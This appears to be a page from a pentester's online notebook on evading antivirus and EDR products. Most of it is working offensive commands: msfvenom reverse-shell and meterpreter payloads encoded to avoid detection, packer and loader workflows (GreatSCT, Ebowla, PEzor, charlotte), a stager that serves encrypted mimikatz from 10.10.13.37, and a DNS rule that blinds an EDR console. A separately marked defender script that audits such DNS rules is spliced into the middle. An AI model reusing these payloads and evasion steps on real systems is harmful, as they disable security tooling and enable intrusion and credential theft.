Pentester's Promiscuous Notebook

AV / EDR Evasion

Last updated 1 month ago

BypassAV Mindmap

Toy EDRs

Recon

Search for active AV processes on hosts (local admin privileges required):

Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}

Identify Microsoft.NET version from inspecting assembly properties:

PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
Or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion

Identify Microsoft.NET version from querying the registry:

PS > Get-ItemProperty "HKLM:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release

Windows build <-> default .NET Framework version associations:

Windows Build   Default .NET Framework Version
1511            4.6.1
1607            4.6.2
1703            4.7
1709            4.7.1
1803            4.7.2
1909+           4.8

.NET Framework version <-> CLR version associations:

.NET Framework Version   CLR Version
2.0, 3.0, 3.5            2
4, 4.5-4.8               4

Note that we don't have to target the exact .NET Framework version when compiling our tools. It's enough to match the above relationship between .NET Framework version and CLR version, i.e. all 4.x versions will execute on CLR v4. For example, Rubeus compiled to target v4.5 will run on a machine with only .NET v4.0 installed.

Potential scan exclusions:

  • C:\Windows\System32\LogFiles\
  • C:\Windows\System32\inetsrv\
  • C:\Windows\ClusterStorage\
  • C:\ProgramData\Microsoft\Windows\Hyper-V\

Attacking EDRs

EDRPrison

WinDivert

.NET:

Python:

Name Resolution Policy Table

Add rule:

PS > Add-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" -NameServers 127.0.0.1 -Comment "MegaCorp EDR Web Panel"
PS > Clear-DnsClientCache -Confirm:$false

Remove rule:

PS > Get-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" | Remove-DnsClientNrptRule -PassThru -Confirm:$false -Force
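Added example (not from the notebook): a defender-side audit of NRPT rules that reports any rule whose resolver is loopback or not on the trusted list, which is what the redirect above looks like from the host. It assumes the trusted resolver list is filled in for the environment and that locally created rules are stored as GUID-named subkeys under the Dnscache DnsPolicyConfig key.

```powershell
# Audit NRPT rules for resolvers that could hijack security-tool name resolution.
# Run as local admin on the host being checked.
function Get-SuspiciousNrptRule {
    param(
        # Known-good DNS servers for the environment (constructed sample values).
        [string[]]$TrustedNameServers = @('10.0.0.53', '10.0.1.53')
    )

    # Locally created rules (Add-DnsClientNrptRule) live here; GPO-delivered rules
    # live under HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsPolicyConfig.
    # Assumption: the rule's Name property equals its GUID subkey name.
    $localKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsPolicyConfig'

    Get-DnsClientNrptRule | ForEach-Object {
        $rule = $_
        $ns = @($rule.NameServers)
        # Loopback / unspecified resolvers have no legitimate use in an NRPT rule.
        $loopback  = $ns | Where-Object { $_ -like '127.*' -or $_ -eq '::1' -or $_ -like '0.*' }
        # Anything outside the trusted list deserves a look (e.g. attacker-controlled host).
        $untrusted = $ns | Where-Object { $TrustedNameServers -notcontains $_ }

        if ($loopback -or $untrusted) {
            [pscustomobject]@{
                Name        = $rule.Name
                Namespace   = (@($rule.Namespace) -join ',')
                NameServers = ($ns -join ',')
                Comment     = $rule.Comment
                IsLocal     = (Test-Path (Join-Path $localKey $rule.Name))
                Reason      = $(if ($loopback) { 'loopback/unspecified resolver' }
                               else { 'resolver not in trusted list' })
            }
        }
    }
}

Get-SuspiciousNrptRule | Format-Table -AutoSize
```

Confirmed rules can be removed with Remove-DnsClientNrptRule as shown above; for ongoing detection, a Sysmon registry rule (Event ID 12/13) on the two DnsPolicyConfig keys catches new rules at creation time.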

EDR Blindspots

Bring Your Own Interpreter (BYOI)

Python

Pyramid

BOFs with Python

Python RDI

Backdoor Electron Applications (JavaScript)

PE Obfuscation

OLLVM

Install LLVM 13.x obfuscator based on heroims/obfuscator and tpoechtrager/wclang:

apk update
apk add --no-cache build-base cmake git python3 mingw-w64-gcc
rm -rf /var/cache/apk/*
git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm
cd /opt/ollvm
wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch
patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=`realpath ../clang`|g" CMakeCache.txt
make -j7
make install
git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang
cd /opt/wclang
cmake .
make -j7
make install
rm -rf /opt/ollvm /opt/wclang && mkdir /build

TinyCC

PS > curl https://download.savannah.gnu.org/releases/tinycc/tcc-0.9.27-win64-bin.zip -o tcc.zip
PS > Expand-Archive .\tcc.zip -DestinationPath .
PS > rm tcc.zip; cd tcc
PS > curl https://github.com/DosX-dev/obfus.h/raw/refs/heads/main/include/obfus.h -o obfus.h
PS > curl https://download.savannah.gnu.org/releases/tinycc/winapi-full-for-0.9.27.zip -o tcc-winapi.zip
PS > Expand-Archive .\tcc-winapi.zip -DestinationPath .
PS > rm tcc-winapi.zip
PS > Copy-Item -Path .\winapi-full-for-0.9.27\include\* -Destination .\include\ -Recurse -Force
PS > .\tcc.exe -w -DVIRT -DCFLOW_V2 -DANTIDEBUG_V2 -o msgbox.exe msgbox.c -luser32

String Encryption

Tools

PowerShell Tactics

PowerShell Obfuscation

Invoke-Obfuscation

Out-EncryptedScript.ps1

PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec

PowerShellArmoury

PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex

Tools

msfvenom

$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe

Veil-Evasion

Hyperion + PEScrambler

$ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe

GreatSCT

Install and generate a payload:

$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}

$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Exec with msbuild.exe and get a shell:

PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml

Ebowla

$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
...Edit output_type, payload_type, clean_output, [[ENV_VAR]]...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe

PEzor

Wrap executable into PEzor:

$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2

inceptor

ScareCrow

charlotte

$ sudo apt install 'mingw-w64*' -y
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin
$ python charlotte.py
Cmd > rundll32.exe charlotte.dll, <XOR_KEY>

MeterPwrShell

$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate

stager_libpeconv

$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe

References

https://xacone.github.io/BestEdrOfTheMarket.html
https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/
https://github.com/Helixo32/CrimsonEDR
https://github.com/0xflux/Sanctum
https://github.com/ethereal-vx/Antivirus-Artifacts
https://github.com/Mr-Un1k0d3r/EDRs
https://mansk1es.gitbook.io/edr-binary-abuse/
https://xss.is/threads/67718/
https://www.safebreach.com/blog/dark-side-of-edr-offensive-tool/
https://www.alteredsecurity.com/post/when-the-hunter-becomes-the-hunted-using-custom-callbacks-to-disable-edrs
https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/
https://www.3nailsinfosec.com/post/edrprison-borrow-a-legitimate-driver-to-mute-edr-agent
https://github.com/senzee1984/EDRPrison
https://tierzerosecurity.co.nz/2024/07/23/edr-telemetry-blocker.html
https://reqrypt.org/windivert-doc.html
https://github.com/basil00/Divert/wiki/WinDivert-Documentation
https://github.com/TechnikEmpire/WinDivertSharp
https://github.com/xljiulang/WindivertDotnet
https://github.com/ffalcinelli/pydivert
https://github.com/shuxin/pydivert
https://github.com/xshiraori/PyDivert2
https://cloudbrothers.info/en/edr-silencers-exploring-methods-block-edr-communication-part-1/
https://synzack.github.io/Bring-Your-Own-Interpreter/
https://github.com/hakril/PythonForWindows
https://trustedsec.com/blog/operating-inside-the-interpreted-offensive-python
https://github.com/Teach2Breach/rpeloader
https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html
https://github.com/naksyn/Pyramid
https://github.com/naksyn/Embedder
https://gist.github.com/snovvcrash/39263ccae8e07210c3f87c9472b4c908
https://github.com/rkbennett/pybof
https://tishina.in/execution/python-inmemory-bof
https://github.com/zimnyaa/inmembof.py
https://github.com/ELMERIKH/PyinMemoryPE
https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter/source/extensions/python
https://github.com/n1nj4sec/pupy/tree/unstable/client/sources
https://www.ibm.com/think/x-force/bypassing-windows-defender-application-control-loki-c2
https://github.com/boku7/Loki
https://blog.es3n1n.eu/posts/obfuscator-pt-1
https://0xpat.github.io/Malware_development_part_6/
https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec
https://github.com/icyguider/Shhhloader
https://hub.docker.com/repository/docker/snovvcrash/ollvm13
https://github.com/jonpalmisc/limoncello
https://github.com/heroims/obfuscator
https://github.com/tpoechtrager/wclang
https://bellard.org/tcc/
https://github.com/DosX-dev/obfus.h
https://gist.github.com/EvanMcBroom/ad683e394f84b623da63c2b95f6fb547
https://github.com/skadro-official/skCrypter
https://github.com/trustedsec/The_Shelf/blob/main/POC/impacketremoteshell/RemoteMaint/stringobf.h
https://github.com/Evi1Grey5/Bypass-Smartscreen-/blob/main/obfuscate.h
https://github.com/mike1k/perses
https://github.com/weak1337/Alcatraz
https://github.com/es3n1n/obfuscator
https://github.com/d35ha/CallObfuscator
https://github.com/ac3ss0r/obfusheader.h
https://github.com/EgeBalci/deoptimizer
https://github.com/DosX-dev/Astral-PE
https://github.com/specterops/at-ps
https://telegra.ph/Komandy-PowerShell-dlya-pentesterov-03-01
https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation
https://github.com/t3l3machus/PowerShell-Obfuscation-Bible
https://github.com/tokyoneon/Chimera
https://github.com/klezVirus/chameleon
https://github.com/AdrianVollmer/PowerHub
https://github.com/danielbohannon/Invoke-Obfuscation
https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide
https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-EncryptedScript.ps1
https://powersploit.readthedocs.io/en/latest/ScriptModification/Out-EncryptedScript/
https://github.com/cfalta/PowerShellArmoury
https://cyberstoph.org/posts/2019/12/evading-anti-virus-with-powershell-armoury/
https://cyberstoph.org/posts/2020/02/psarmoury-1.4-now-with-even-more-armour/
https://github.com/GreatSCT/GreatSCT
https://github.com/phra/PEzor
https://klezvirus.github.io/RedTeaming/AV_Evasion/CodeExeNewDotNet/
https://github.com/klezVirus/inceptor
https://github.com/optiv/ScareCrow
https://www.grahamhelton.com/blog/scarecrow/
https://adamsvoboda.net/evading-edr-with-scarecrow/
https://github.com/9emin1/charlotte
https://github.com/cepxeo/dll4shell
https://github.com/GetRektBoy724/MeterPwrShell/releases
https://raikia.com/tool-powershell-encoder/
https://github.com/tothi/stager_libpeconv
https://github.com/hasherezade/libpeconv
https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
https://codeby.net/threads/meterpreter-snova-v-dele-100-fud-with-metasploit-5.66730/
https://github.com/phackt/stager.dll
https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad
https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
https://xakep.ru/2020/12/23/shikata-ga-nai/
https://infosecwriteups.com/evade-avs-edr-with-shellcode-injection-159dde4dba1a?gi=84db9a8c5c5f
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/
https://blog.sunggwanchoi.com/creating-a-loader-poc-using-various-languages/
https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/
https://xakep.ru/2021/07/23/detection-bypassing/
https://zen.yandex.ru/media/id/5d4f02da027a1500ad43866f/obhodim-antivirusy-kriptor-net-prilojenii-5fc6a199a8f33a1036140386
https://www.synacktiv.com/publications/a-dive-into-microsoft-defender-for-identity.html